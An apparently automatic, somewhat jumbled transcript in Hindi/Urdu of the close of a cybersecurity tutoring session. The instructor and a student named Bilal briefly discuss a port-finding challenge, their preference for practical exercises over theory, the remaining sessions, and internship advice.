मिल जाएगा। वो भी है सर, वरना इसी के क्यूरी जो सी है ना, आप बेशक ये को बता दें, अभी लिख लेगा ग्रुप वाली की। तो उसको आप कह दें कि पोर्ट्स वाली सारी फाइंड करो और असेंडिंग में मुझे चाहिए। सॉरी। आप उसको जी, कह दें कि असेंडिंग में करो, उसके बाद मुझे फर्स्ट और लास्ट पोर्ट दे दो, तो वो खुद ही फाइंड वो करके दे दे देगा। देगा, यस यस यस। अच्छा, अम, हम लोगों ने तो वैसे आंसर्स तो सब ये अगर स्टूडेंट्स हमारे करें तो ये सारे हमारे, अगर चैलेंज अगर ये लोग करें तो ये ऑलरेडी इनके पास आंसर्स होगा। लेकिन मैं फिर भी बोल देता हूँ कि दिस चैलेंज हैज बीन completed during today's session। सही है, चैलेंज ठीक है। तो यार प्रैक्टिकल में ज्यादा मजा आता है यार बिलाल, मैं क्या बताऊं, वो ऐसे ही है सर, थ्योरेटिकल में अल्हम्दुलिल्लाह। बिल्कुल मजा नहीं आता है इतना ना। मतलब जी सर। समझाना तो पड़ता है ना, मतलब कुछ ना कुछ तो थ्योरेटिकल देना पड़ता है, बट अगर हम इधर से स्टार्ट करें ना चैलेंज से, एंड देन वी मूव ऑन टू थ्योरेटिकल, वो ज्यादा अच्छा रहेगा। बिल्कुल ऐसे, वैसे भी सर मुझे खुद जो है थोड़ा सा है इशू थ्योरी थ्योरी के साथ। तो मैं हमेशा प्रैक्टिकल में या इस तरह से भी जब हमारी ट्रेनिंग कोई होती है तो मैं कोशिश ये होती है कि उनको कहूँ कि प्रैक्टिकल ही ज़्यादा लेके चलो मुझे, क्योंकि थ्योरी से ज़्यादा ज़्यादा देर में पढ़ नहीं पाता, मतलब रट नहीं पाता उसको ज़्यादा देर, थोड़ी देर बाद हम्म, वो नहीं दिमाग आपकी से ऊपर बात से सही है। जाती है। तो वो फिर हम्म, प्रैक्टिकल साथ साथ उनको कहता हूँ कि मुझे बता दें ये एग्जाम्पल प्रैक्टिकल तब जाके माइंड में आना शुरू होती है, क्योंकि वो एक इमेज सा बिल्ड होना शुरू हो जाता है माइंड के अंदर, तो तब जाके। नहीं हम ऐसा करेंगे, हम 2-3 चैलेंजेस कर लेंगे। लेट्स से कि देखो ये वाला तो बहुत आसान था ना, अभी जो हमने किया जी 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 है जी ना, हाँ। ये तो बहुत आसान था। पता नहीं, ऐसे मुझे मुझे तो बहुत आसान लगा, मतलब ऐसे अगर ही तो आप भी बिल्कुल मेरे सही। साथ कर रहे हो तो इसका मतलब ये कि आसान था, हालांकि इसकी डिफिकल्टी मीडियम है। लेकिन अगर हम लोग यहाँ पे आ जाए ना, देखो ये मीडियम है, ये इजी है, ये easy, अगर ये हम लोग कर लेना 2-3 चैलेंजेस कर ले एक ही क्लास में, दैट वुड बी मोर बेनिफिशियल। बाकी अगर इस कोर्स के आउटलाइन की बात करें, हम वो आहिस्ता आहिस्ता डिलीवर करते रहेंगे, ये वाला कोर्स जो है, या आहिस्ता आहिस्ता बताते रहेंगे साथ साथ। इस तरह चलो कर लेते हैं हम लोग नेक्स्ट सेशन में। हमारे पास तो अभी ये 14th सेशन हो गया है, 14 सॉरी साल। 13 13 जी 13। जी। तो एक दो और फिर उसके बाद 3-4 सेशंस बाकी है ना, तो जी, 4 नहीं 5 सेशंस बाकी हैं। चलो इसको फिर हम लोग ना, हम लोग प्रैक्टिकल रखते हैं ताकि जो है ना थोड़ा सा इंटरेस्टिंग रहे और मजा आए। इंशाल्लाह सर। बाकी कुछ भी सवाल हो, कुछ भी हो यार, जरूर यू कैन टेक इंटरव्यू टिप्स फ्रॉम मी एज वेल इफ यू हैव एनी इंटरव्यूज। और फिलहाल अभी तो
लेट मी हम नो। साइट पर रिव्यू अभी आइडिया नहीं वो सॉरी अप्लाई भी नहीं कर रहा है इसमें अरे क्योंकि करना इसके शुरू कर दो, डू नॉट वेट। देखो बात सुनो, हमेशा जो है ना, डू नॉट वेट फॉर द अपॉर्चुनिटी टू कम टू यू, यू हैव टू ग्रैब उसके द बाद मुझे अपॉर्चुनिटी। अभी ऐसा है कि इसमें कोई मिलती भी इंटर्नशिप भी अभी स्टार्टअप में मिलेगी तो वही ढूंढनी पड़ेगी और जॉब प्रॉपर मिलेगी तो तो अभी के लिए बेशक आप इंटर्नशिप कर लो, एटलीस्ट यू हैव जी जी एक्सपीरियंस। देखो एक्सपीरियंस होगा ना बिल्कुल सर तो तो मैं कंपनी कोशिश उठाएगी है आपको। जहाँ ऑर्गेनाइजेशन में कर रहा हूँ वहीं हम्म। से वो एक्सेस अगर दे दें सिक्योरिटी टीम तो लर्निंग उन्हीं के टूल्स से कर लूँ और हाँ, जैसे कि उनका ना XDR या बाकी सोल्यूशन जो भी है तो वहीं से हाँ, लर्निंग करी हो जाए तो कोशिश कर बस। रहा हूँ कि अगर उनसे टूल से मिल जाए तो ये हो कि थोड़ा बेसिक लेवल का कवर हो पहले से प्रैक्टिकल और हम्म। टूल्स फिर आगे कहीं मार्केट में मूव करो इस हम्म। तरह से कुछ बस अपॉर्चुनिटी की कोशिश कर रहा हूँ अभी उनके साथ ही बात की थी तो हम्म। जैसे टाइम मैनेज होता है तो उनका भी स्टार्ट करूंगा उनसे बात की है उन्होंने लीव के लिए बोल दी है कि कर देंगे बाकी बस देखते सही है, उनके पीछे पड़े रहो, क्योंकि दिस इज लर्निंग फॉर हैं यू। ठीक है ना? ऐसे ही सर जी जी वैसे ही सर चलो तो ठीक है, फिर अपना ख्याल रखो, एंड इंशाल्लाह हम लोग नेक्स्ट सेशन में मिलते हैं। ठीक है बिलाल? इंशाल्लाह इंशाल्लाह सर थैंक यू फॉर योर एफर्ट एंड टाइम यार। आप एक वही वाहिद हो जो कि एंड तक क्लास लेते हैं, यू नो। सर बस इंटरेस्टिंग है आप लोग माशाल्लाह अच्छा पढ़ाते हैं तो अच्छा ही रहता है अरे थैंक यू सो मच, इफ यू नीड एनीथिंग जस्ट लेट मी नो, ठीक है? सही थैंक यू सो मच चलो, थैंक यू। ओके, अल्लाह हाफिज।